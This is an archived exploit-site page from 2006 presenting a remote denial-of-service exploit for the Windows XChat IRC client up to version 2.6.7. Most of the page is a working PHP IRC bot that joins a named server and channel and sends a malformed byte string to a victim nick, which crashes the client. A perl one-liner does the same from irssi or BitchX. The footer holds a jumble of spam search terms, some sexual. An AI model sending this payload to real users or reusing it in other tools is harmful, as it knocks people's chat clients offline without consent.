about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , XChat <= 2.6.7 (Windows Version) Remote Denial of Service Exploit




2006-08-07 XChat <= 2.6.7 (Windows Version) Remote Denial of Service Exploit
Rated as : High Risk

<?
 # another way to test this with irssi/bitchx <below> /str0ke
 # /exec -o perl -e 'print
"\x9x\xF0\x92\x8D\x85\xF1\xA5\x90\xB4\xF1\x96\x9E\x85\xF1\xA6\x8D\xA5\xF1\xB8\xA5\x85\xF1\xA7\x95\xA8\x29\xF2\x95\x95\x82"'
 ?>

<?php
// XChat <= 2.6.7 Windows Remote Crash DoS by ratboy
// Tested on Windows SP1/SP2          
// The following bug was tested on the XChat <= 2.6.7 on Windows
SP1/SP2  

//Stop the script timing out
set_time_limit(0);

//Set constants
define("SERVER", 'irc.enigmagroup.org');
define("PORT", 6667);
define("CHANNEL", "#enigmagroup");  //Set the channel
the bot will join here
define("NICK", "ratbot");    //Set the bot's nick
here
define("EXPLOIT",
"\x9x\xF0\x92\x8D\x85\xF1\xA5\x90\xB4\xF1\x96\x9E\x85\xF1\xA6\x8D\xA5\xF1\xB8\xA5\x85\xF1\xA7\x95\xA8\x29\xF2\x95\x95\x82");
define("VICTIM", "ratboy");

$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP); // Create the
Socket
$fp = socket_connect($socket, SERVER, PORT); // Connect to the server
socket_write($socket,"USER ratboy ratboy ratboy :ratboy\r\n");
// Send the Username to the server
socket_write($socket,"NICK ".NICK." \r\n"); // Change
our nickname
socket_write($socket,"JOIN ".CHANNEL." \r\n"); // Join
the channel
while($data = @socket_read($socket,2046)) { //read the data
    echo $data;
    $cmd = explode(" ", $data);

    if (strpos($data, "PING :")===0) {
        socket_write($socket, "PONG :".substr($data,
6)."\r\n");
        continue;
    }
    
    if($cmd[1] == "PRIVMSG"){  // Send the exploit right when
the channel gets a message then stop the bot
        socket_write($socket, "PRIVMSG ".VICTIM."
:".EXPLOIT."\r\n");
        socket_close($socket);
    }
}

?> 
securitydot.net - 2006-08-07

Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 08:04:10 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Punjab.sex sabrina 200 /compo null ipc$ news for C pink ward ?? ?? ?? ? IPB 2.1.5 Microsoft news for c mambo Remo hotgaysex blue filim Tamil actr hot sexy w NukeSentin IBPROARCAD administra Www.tamils Home sex blondegirl fuck.c Blue Coat news for c maxcpm.inf Dog piche aduld sex long.qqyin mirc 6.16 fj862.blog Pakistanis www.lailai Bokonbokon Chunked-En www.buy-ka wife swapp CMS is Fre news for c Sagilasexm Playboys.c search/exp news for c Bideoporno ftvangles www.scipha Geam Bideoporno ftvangles S....com%2 S....com%2